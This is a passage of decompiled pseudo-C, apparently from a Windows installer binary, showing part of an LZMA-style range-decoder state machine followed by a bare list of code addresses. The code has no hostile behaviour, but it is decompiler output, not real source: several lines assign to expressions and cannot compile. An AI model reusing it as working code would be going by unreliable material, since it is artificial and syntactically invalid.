								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                                                        0x00000000
                                                                                                                        0x004070ab
                                                                                                                        0x004070ab
                                                                                                                        0x004070af
                                                                                                                        0x00407166
                                                                                                                        0x00407169
                                                                                                                        0x00407175
                                                                                                                        0x00407056
                                                                                                                        0x00407056
                                                                                                                        0x00407059
                                                                                                                        0x004073cb
                                                                                                                        0x004073cb
                                                                                                                        0x004073ce
                                                                                                                        0x004073ce
                                                                                                                        0x004073d4
                                                                                                                        0x004073da
                                                                                                                        0x004073e0
                                                                                                                        0x004073fa
                                                                                                                        0x004073fd
                                                                                                                        0x00407403
                                                                                                                        0x0040740e
                                                                                                                        0x00407410
                                                                                                                        0x004073e2
                                                                                                                        0x004073e2
                                                                                                                        0x004073f1
                                                                                                                        0x004073f5
                                                                                                                        0x004073f5
                                                                                                                        0x0040741a
                                                                                                                        0x00407441
                                                                                                                        0x00407441
                                                                                                                        0x00407447
                                                                                                                        0x00407447
                                                                                                                        0x00000000
                                                                                                                        0x0040741c
                                                                                                                        0x0040741c
                                                                                                                        0x00407420
                                                                                                                        0x004075cf
                                                                                                                        0x00000000
                                                                                                                        0x004075cf
                                                                                                                        0x0040742c
                                                                                                                        0x00407433
                                                                                                                        0x0040743b
                                                                                                                        0x0040743e
                                                                                                                        0x00000000
                                                                                                                        0x0040743e
                                                                                                                        0x004070b5
                                                                                                                        0x004070b9
                                                                                                                        0x004075fa
                                                                                                                        0x004075fa
                                                                                                                        0x004075fd
                                                                                                                        0x00407601
                                                                                                                        0x00407601
                                                                                                                        0x004070bf
                                                                                                                        0x004070c5
                                                                                                                        0x004070c8
                                                                                                                        0x004070cc
                                                                                                                        0x004070cf
                                                                                                                        0x004070d3
                                                                                                                        0x00407599
                                                                                                                        0x004075e5
                                                                                                                        0x004075ed
                                                                                                                        0x004075f4
                                                                                                                        0x004075f6
                                                                                                                        0x00000000
                                                                                                                        0x004075f6
                                                                                                                        0x004070d9
                                                                                                                        0x004070dc
                                                                                                                        0x004070e2
                                                                                                                        0x004070e4
